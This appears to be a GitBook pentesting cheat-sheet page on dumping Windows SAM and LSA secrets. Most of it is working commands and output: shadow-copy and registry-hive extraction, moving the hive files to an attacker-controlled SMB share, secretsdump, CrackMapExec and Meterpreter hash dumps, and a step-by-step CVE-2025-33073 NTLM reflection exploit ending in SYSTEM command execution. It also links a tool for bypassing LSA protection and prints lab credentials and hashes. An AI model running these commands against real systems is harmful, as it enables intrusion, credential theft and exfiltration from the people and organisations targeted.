SAM & LSA secrets

You need at least local admin privilege on the remote target, use option --local-auth if your user is a local account

Shadow Copies / Snapshots

REMOTE WINDOWS CREDENTIAL DUMP WITH SHADOW SNAPSHOTS: EXPLOITATION AND DETECTIONLabs at ITRES

Enumerate the host for shadow copy volumes

*Evil-WinRM* PS C:\Users\Administrator\Documents> vssadmin list shadows
vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
(C) Copyright 2001-2013 Microsoft Corp.

Contents of shadow copy set ID: {00168<-SNIP->d07ca}
   Contained 1 shadow copies at creation time: 9/9/2019 3:10:57 AM
      Shadow Copy ID: {04639<-SNIP->b017ef}
         Original Volume: (C:)\\?\Volume{21385<-SNIP->0000}\
         Shadow Copy Volume: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
         Originating Machine: foo.bar.local
         Service Machine: foo.bar.local
         Provider: 'Microsoft Software Shadow Copy provider 1.0'
         Type: ClientAccessible
         Attributes: Persistent, Client-accessible, No auto release, No writers, Differential

*Evil-WinRM* PS C:\Users\Administrator\Desktop> cmd /c mklink /d C:\VSS \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\
symbolic link created for C:\VSS <<===>> \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\
*Evil-WinRM* PS C:\Users\Administrator\Desktop> download C:\\VSS\\windows\\system32\\config\\SAM
                                        
Warning: Remember that in docker environment all local paths should be at /data and it must be mapped correctly as a volume on docker run command
                                        
Info: Downloading C:\\VSS\\windows\\system32\\config\\SAM to SAM
                                        
Info: Download successful!
*Evil-WinRM* PS C:\Users\Administrator\Desktop> download C:\\VSS\\windows\\system32\\config\\SYSTEM
                                        
Warning: Remember that in docker environment all local paths should be at /data and it must be mapped correctly as a volume on docker run command
                                        
Info: Downloading C:\\VSS\\windows\\system32\\config\\SYSTEM to SYSTEM
                                        
Info: Download successful!
*Evil-WinRM* PS C:\Users\Administrator\Desktop> download C:\\VSS\\windows\\system32\\config\\SECURITY
                                        
Warning: Remember that in docker environment all local paths should be at /data and it must be mapped correctly as a volume on docker run command
                                        
Info: Downloading C:\\VSS\\windows\\system32\\config\\SECURITY to SECURITY
                                        
Info: Download successful!
*Evil-WinRM* PS C:\Users\Administrator\Desktop>

$ secretsdump.py -sam SAM -system SYSTEM -security SECURITY LOCAL

With Mimikatz

shadowcopies | The Hacker Toolstools.thehacker.recipes

Step by step - Manual

Create a Shadow Snapshot

wmic shadowcopy call create Volume='C:\'

C:\Users\peter>wmic /node:192.168.24.153 /user:peter /password:[***] shadowcopy call create Volume='C:\'
Executing (Win32_ShadowCopy)->create()
Method execution successful.
Out Parameters:
instance of __PARAMETERS
{
        ReturnValue = 0;
        ShadowID = "{037BE7D1-2915-422A-B961-13065D469BE7}";
};


C:\Users\peter>

Get the path listing them

vssadmin list shadows
[...]
Contents of shadow copy set ID: {5590bae6-9edc-4012-b58a-5ff54e937cae}
Contained 1 shadow copies at creation time: 03/06/2025 17:12:36
Shadow Copy ID: {6efd3825-90a8-465e-8205-f445f2775769}
Original Volume: (C:)\?\Volume{1d680c6d-69f7-4ad4-8177-b8240d0cf94c}\Shadow Copy Volume: \?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2
[...]

Access the Shadow Snapshot and navigate to Windows\System32\Config. One of the easiest methods was to use 7z, in latest versions it is not possible.

Over SMB - Automation

Impacket -use-remoteSSMethod

impacket-secretsdump -use-remoteSSMethod “./Admin:1234@192.168.1.161”

SAM

Registry Hive

Description

hklm\sam

Contains the hashes associated with local account passwords. We will need the hashes so we can crack them and get the user account passwords in cleartext.

hklm\system

Contains the system bootkey, which is used to encrypt the SAM database. We will need the bootkey to decrypt the SAM database.

hklm\security

Contains cached credentials for domain accounts. We may benefit from having this on a domain-joined Windows target.

Windows

C:\WINDOWS\system32> reg.exe save hklm\sam C:\sam.save

The operation completed successfully.

C:\WINDOWS\system32> reg.exe save hklm\system C:\system.save

The operation completed successfully.

C:\WINDOWS\system32> reg.exe save hklm\security C:\security.save

The operation completed successfully.

Transfer files

Also see

Download - Exfiltration

$ sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py -smb2support CompData /home/ltnbob/Documents/

Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed

C:\> move sam.save \\10.10.15.16\CompData
        1 file(s) moved.

C:\> move security.save \\10.10.15.16\CompData
        1 file(s) moved.

C:\> move system.save \\10.10.15.16\CompData
        1 file(s) moved.

esentutl.exe

Dumping SAM via esentutl.exe | Red Team Noteswww.ired.team

Secretsdump

$ python3 /usr/share/doc/python3-impacket/examples/secretsdump.py -sam sam.save -security security.save -system system.save LOCAL

Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] Target system bootKey: 0x4d8c7cff8a543fbf245a363d2ffce518
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:3dd5a5ef0ed25b8d6add8b2805cce06b:::
defaultuser0:1000:aad3b435b51404eeaad3b435b51404ee:683b72db605d064397cf503802b51857:::
bob:1001:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::
sam:1002:aad3b435b51404eeaad3b435b51404ee:6f8c3f4d3869a10f3b4f0522f537fd33:::
rocky:1003:aad3b435b51404eeaad3b435b51404ee:184ecdda8cf1dd238d438c4aea4d560d:::
ITlocal:1004:aad3b435b51404eeaad3b435b51404ee:f7eb9c06fafaa23c4bcf22ba6781c1e2:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] DPAPI_SYSTEM 
dpapi_machinekey:0xb1e1744d2dc4403f9fb0420d84c3299ba28f0643
dpapi_userkey:0x7995f82c5de363cc012ca6094d381671506fd362
[*] NL$KM 
 0000   D7 0A F4 B9 1E 3E 77 34  94 8F C4 7D AC 8F 60 69   .....>w4...}..`i
 0010   52 E1 2B 74 FF B2 08 5F  59 FE 32 19 D6 A7 2C F8   R.+t..._Y.2...,.
 0020   E2 A4 80 E0 0F 3D F8 48  44 98 87 E1 C9 CD 4B 28   .....=.HD.....K(
 0030   9B 7B 8B BF 3D 59 DB 90  D8 C7 AB 62 93 30 6A 42   .{..=Y.....b.0jB
NL$KM:d70af4b91e3e7734948fc47dac8f606952e12b74ffb2085f59fe3219d6a72cf8e2a480e00f3df848449887e1c9cd4b289b7b8bbf3d59db90d8c7ab6293306a42
[*] Cleaning up...

Only SAM and SYSTEM

secretsdump -sam SAM -system SYSTEM LOCAL

Metasploit

meterpreter > hashdump

 meterpreter > lsa_dump_sam

Netexec - CME

NetExec - CME

nxc smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --sam

Local admin

$ crackmapexec smb 10.129.42.198 --local-auth -u bob -p HTB_@cademy_stdnt! --sam

SMB         10.129.42.198   445    WS01      [*] Windows 10.0 Build 18362 x64 (name:FRONTDESK01) (domain:WS01) (signing:False) (SMBv1:False)
SMB         10.129.42.198   445    WS01      [+] FRONTDESK01\bob:HTB_@cademy_stdnt! (Pwn3d!)
SMB         10.129.42.198   445    WS01      [+] Dumping SAM hashes
SMB         10.129.42.198   445    WS01      Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         10.129.42.198   445    WS01     Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         10.129.42.198   445    WS01     DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         10.129.42.198   445    WS01     WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:72639bbb94990305b5a015220f8de34e:::
SMB         10.129.42.198   445    WS01     bob:1001:aad3b435b51404eeaad3b435b51404ee:cf3a5525ee9414229e66279623ed5c58:::
SMB         10.129.42.198   445    WS01     sam:1002:aad3b435b51404eeaad3b435b51404ee:a3ecf31e65208382e23b3420a34208fc:::
SMB         10.129.42.198   445    WS01     rocky:1003:aad3b435b51404eeaad3b435b51404ee:c02478537b9727d391bc80011c2e2321:::
SMB         10.129.42.198   445    WS01     worker:1004:aad3b435b51404eeaad3b435b51404ee:58a478135a93ac3bf058a5ea0e8fdb71:::
SMB         10.129.42.198   445    WS01     [+] Added 8 SAM hashes to the database

Mimikatz

SilentSAM

Leverage raw disk access and parsing the NTFS Master File Table (MFT)

GitHub - ryukk33/SilentSAMGitHub

SharpSAMDump

GitHub - jojonas/SharpSAMDump: SAM Dumping in C#GitHub

CVE-2025-33073 - NTLM Reflection

In the context of CVE-2025-33073, machines with SMB signing enforced were not affected by the vulnerability, even without Microsoft's patch.

Prerequisites:

The target machine hasn't applied the June 10th update
SMB signing is not required (which is the default on Windows 10, Server 2022, and older builds of Windows 11)
Users can add DNS records (default configuration)

Exploitation:

Add a DNS record with a crafted name (1UWhRCA...)
Launch ntlmrelayx
Trigger a coercion attack like PetitPotam

$ dnstool.py -u 'ASGARD.LOCAL\loki' -p loki 192.168.56.10 -a add -r srv11UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA -d 192.168.56.3
[-] Adding new record
[+] LDAP operation completed successfully

$ PetitPotam.py -u loki -p loki -d ASGARD.LOCAL srv11UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA SRV1.ASGARD.LOCAL
[-] Sending EfsRpcEncryptFileSrv!
[+] Got expected ERROR_BAD_NETPATH exception!!
[+] Attack worked!

# ntlmrelayx.py -t SRV1.ASGARD.LOCAL -smb2support
[*] Servers started, waiting for connections
[*] SMBD-Thread-5 (process_request_thread): Received connection from 192.168.56.14, attacking target smb://SRV1.ASGARD.LOCAL
[*] Authenticating against smb://SRV1.ASGARD.LOCAL as / SUCCEED
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x0c10b250470be78cbe1c92d1b7fe4e91
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:df3c08415194a27d27bb67dcbf6a6ebc:::
user:1000:aad3b435b51404eeaad3b435b51404ee:57d583aa46d571502aad4bb7aea09c70:::
[*] Done dumping SAM hashes for host: 192.168.56.14

NTLM reflection is dead, long live NTLM reflection! – An in-depthSynacktiv

Other method:

A Look in the Mirror - The Reflective Kerberos Relay AttackRedTeam Pentesting - Blog

1 . Coercion

$ wspcoerce 'lab.redteam/user1:KojbyRyibdinWom)@client1.lab.redteam' \
    file:////client11UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA/path
Impacket v0.13.0.dev0+20250408.175013.349160df - Copyright 2023 Fortra

[*] Connected to IPC$
[*] Opened MsFteWds pipe
[*] Sent WSP Connect
[*] Sent WSP Query
[*] Sent WSP Disconnect

Answer local name resolution queries

$ sudo pretender -i eth1 --no-dhcp-dns --no-timestamps \
    --spoof '*1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA*'
Pretender by RedTeam Pentesting v1.3.2-74e629fcc5
Listening on interface: eth1
IPv4 relayed to: 192.168.56.11
IPv6 relayed to: fe80::a00:27ff:fe89:bdac
Answering queries for: *1uwhrcaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaybaaaa*

[mDNS] listening via UDP on [ff02::fb%eth1]:5353
[NetBIOS] listening via UDP on 192.168.56.255:137
[LLMNR] listening via UDP on [ff02::1:3%eth1]:5355
[mDNS] listening via UDP on 224.0.0.251:5353
[LLMNR] listening via UDP on 224.0.0.252:5355
[...]
[mDNS] "client11UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA" (A) queried by 192.168.56.10 (client1.lab.redteam)
[mDNS] "client11UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA" (A) queried by fe80::6698:d1c7:60cb:8eb9 (client1.lab.redteam, 192.168.56.10)
[mDNS] "client11UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA" (AAAA) queried by 192.168.56.10 (PCSSystemtec)
[mDNS] "client11UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA" (AAAA) queried by fe80::6698:d1c7:60cb:8eb9 (client1.lab.redteam, 192.168.56.10)
[LLMNR] "client11UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA" (A) queried by fe80::6698:d1c7:60cb:8eb9 (client1.lab.redteam, 192.168.56.10)
[LLMNR] "client11UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA" (A) queried by 192.168.56.10 (client1.lab.redteam)
[LLMNR] "client11UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA" (AAAA) queried by fe80::6698:d1c7:60cb:8eb9 (client1.lab.redteam, 192.168.56.10)
[LLMNR] "client11UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA" (AAAA) queried by 192.168.56.10 (client1.lab.redteam)

Relay the ticket back to the victim

$ krbrelayx.py --target smb://client1.lab.redteam -c whoami
[...]
[*] SMBD: Received connection from 192.168.56.10
[*] Service RemoteRegistry is in stopped state
[*] Service RemoteRegistry is disabled, enabling it
[*] Starting service RemoteRegistry
[*] Executed specified command on host: client1.lab.redteam
nt authority\system

[*] Stopping service RemoteRegistry
[*] Restoring the disabled state for service RemoteRegistry

More PoC:

GitHub - mverschu/CVE-2025-33073: PoC Exploit for the NTLM reflection SMB flaw.GitHub

Example:

Pwning Reflection Using NTLM Reflectionserioton

Cracking

Hashes

Online

NTLM to plaintext password lookupNTLM.PW

Pass the Hash (PtH)

LSA

Netexec - CME

NetExec - CME

$ crackmapexec smb 10.129.42.198 --local-auth -u bob -p HTB_@cademy_stdnt! --lsa

SMB         10.129.42.198   445    WS01     [*] Windows 10.0 Build 18362 x64 (name:FRONTDESK01) (domain:FRONTDESK01) (signing:False) (SMBv1:False)
SMB         10.129.42.198   445    WS01     [+] WS01\bob:HTB_@cademy_stdnt!(Pwn3d!)
SMB         10.129.42.198   445    WS01     [+] Dumping LSA secrets
SMB         10.129.42.198   445    WS01     WS01\worker:Hello123
SMB         10.129.42.198   445    WS01      dpapi_machinekey:0xc03a4a9b2c045e545543f3dcb9c181bb17d6bdce
dpapi_userkey:0x50b9fa0fd79452150111357308748f7ca101944a
SMB         10.129.42.198   445    WS01     NL$KM:e4fe184b25468118bf23f5a32ae836976ba492b3a432deb3911746b8ec63c451a70c1826e9145aa2f3421b98ed0cbd9a0c1a1befacb376c590fa7b56ca1b488b

GMSA

If you found an account starting with SC_GMSA{84A78B8C-56EE-465b-8496-FFB35A1B52A7} you can get the account behind:

nxc ldap <ip> -u <user> -p <pass> --gmsa-decrypt-lsa '_SC_GMSA_{84A78B8C-56EE-465b-8496-FFB35A1B52A7}_313e25a880eb773502f03ad5021f49c2eb5b5be2a09f9883ae0d83308dbfa724:01000000240200001000120114021c02fbb096d10991bb88c3f54e153807b4c1cc009d30bc3c50fd6f72c99a1e79f27bd0cbd4df69fdf08b5cf6fa7928cf6924cf55bfd8dd505b1da26ddf5695f5333dd07d08673029b01082e548e31f1ad16c67db0116c6ab0f8d2a0f6f36ff30b160b7c78502d5df93232f72d6397b44571d1939a2d18bb9c28a5a48266f52737c934669e038e22d3ba5a7ae63a608f3074c520201f372d740fddec77a8fed4ddfc5b63ce7c4643b60a8c4c739e0d0c7078dd0c2fcbc2849e561ea2de1af7a004b462b1ff62ab4d3db5945a6227a58ed24461a634b85f939eeed392cf3fe9359f28f3daa8cb74edb9eef7dd38f44ed99fa7df5d10ea1545994012850980a7b3becba0000d22d957218fb7297b216e2d7272a4901f65c93ee0dbc4891d4eba49dda5354b0f2c359f185e6bb943da9bcfbd2abda591299cf166c28cb36907d1ba1a8956004b5e872ef851810689cec9578baae261b45d29d99aef743f3d9dcfbc5f89172c9761c706ea3ef16f4b553db628010e627dd42e3717208da1a2902636d63dabf1526597d94307c6b70a5acaf4bb2a1bdab05e38eb2594018e3ffac0245fcdb6afc5a36a5f98f5910491e85669f45d02e230cb633a4e64368205ac6fc3b0ba62d516283623670b723f906c2b3d40027791ab2ae97a8c5c135aae85da54a970e77fb46087d0e2233d062dcd88f866c12160313f9e6884b510840e90f4c5ee5a032d40000f0650a4489170000f0073a9188170000'

Extract gMSA Secrets | NetExecwww.netexec.wiki

regsecrets.py

Opsec

LSA Secrets: revisiting secretsdumpSynacktiv

https://github.com/fortra/impacket/pull/1898/commits/e8f437200248b641b3baa3ce48505232287150e3#diff-26356d84553992cfb9824fdbbc8bdbaf7afb9cb0248c3adfe40c0037899b6e5fgithub.com

Bypass LSA Protection (aka Protected Process Light)

GitHub - Leo4j/PPLKiller: Tool to bypass LSA Protection (aka Protected Process Light)GitHub

Backup Operators Group

whoami /groups

Group Privileges

Linux

smbserver.py -smb2support "someshare" "./"

# reg.py "internal.abc.local"/"user":'Password'@"192.168.210.16" save -keyName 'HKLM\SAM' -o '\\10.10.14.6\someshare'
Impacket for Exegol - v0.10.1.dev1+20231106.134307.9aa9373 - Copyright 2022 Fortra - forked by ThePorgs

[!] Cannot check RemoteRegistry status. Hoping it is started...
[*] Saved HKLM\SAM to \\10.10.14.6\someshare\SAM.save


# reg.py "internal.abc.local"/"user":'Password'@"192.168.210.16" save -keyName 'HKLM\SYSTEM' -o '\\10.10.14.6\someshare'
Impacket for Exegol - v0.10.1.dev1+20231106.134307.9aa9373 - Copyright 2022 Fortra - forked by ThePorgs

[!] Cannot check RemoteRegistry status. Hoping it is started...
[*] Saved HKLM\SYSTEM to \\10.10.14.6\someshare\SYSTEM.save

# reg.py "internal.abc.local"/"user":'Password'@"192.168.210.16" save -keyName 'HKLM\SECURITY' -o '\\10.10.14.6\someshare'
Impacket for Exegol - v0.10.1.dev1+20231106.134307.9aa9373 - Copyright 2022 Fortra - forked by ThePorgs

[!] Cannot check RemoteRegistry status. Hoping it is started...
[*] Saved HKLM\SECURITY to \\10.10.14.6\someshare\SECURITY.save

secretsdump.py -sam 'SAM.save' -security 'SECURITY.save' -system 'SYSTEM.save' LOCAL

Windows

C:\htb> reg save HKLM\SYSTEM SYSTEM.SAV

The operation completed successfully.


C:\htb> reg save HKLM\SAM SAM.SAV

The operation completed successfully.

Go-Secdump

GitHub - jfjallid/go-secdump: Tool to remotely dump secrets from the Windows registryGitHub

./go-secdump --host DESKTOP-AIG0C1D2 --user Administrator --pass adminPass123 --local --sam --lsa --dcc2

Volatility3 - Hashdump

Dump memory acquisition from victim host - With WinPmem or FTK Imager

Windows Tutorial — Volatility 3 2.27.1 documentationvolatility3.readthedocs.io

Releases · Velocidex/WinPmemGitHub

https://cpuu.hashnode.dev/how-to-perform-memory-forensic-analysis-in-windows-11-using-volatility-3cpuu.hashnode.dev

Hashdump / Lsadump

./vol.py -f file.dmp windows.hashdump.Hashdump #Grab common windows hashes (SAM+SYSTEM)
./vol.py -f file.dmp windows.cachedump.Cachedump #Grab domain cache hashes inside the registry
./vol.py -f file.dmp windows.lsadump.Lsadump #Grab lsa secrets

Volatility - CheatSheet - HackTricksbook.hacktricks.xyz

Resources

SAM & LSA secrets | The Hacker Recipeswww.thehacker.recipes

Page not found - HackTricksbook.hacktricks.xyz

Interesting Book

Interesting Books

Disclaimer: As an Amazon Associate, I earn from qualifying purchases. This helps support this GitBook project at no extra cost to you.

Pentesting Active Directory and Windows-based Infrastructure Enhance your skill set to pentest against real-world Microsoft infrastructure with hands-on exercises and by following attack/detect guidelines with OpSec considerations
Infrastructure Attack Strategies for Ethical Hacking Encompassing both external and internal enumeration techniques, the book delves into attacking routers and services, establishing footholds, privilege escalation, lateral movement, and exploiting databases and Active Directory.
RTFM: Red Team Field Manual v2 A quick reference when there is no time to scour the Internet for that perfect command
Red Team Development and Operations: A practical guide The authors have moved beyond SANS training and use this book to detail red team operations in a practical guide.
Cybersecurity Attacks – Red Team Strategies A practical guide to building a penetration testing program having homefield advantage

Support this Gitbook

I hope it helps you as much as it has helped me. If you can support me in any way, I would deeply appreciate it.

PreviousPrivilege escalation NextNTLM Hashes

Last updated 4 months ago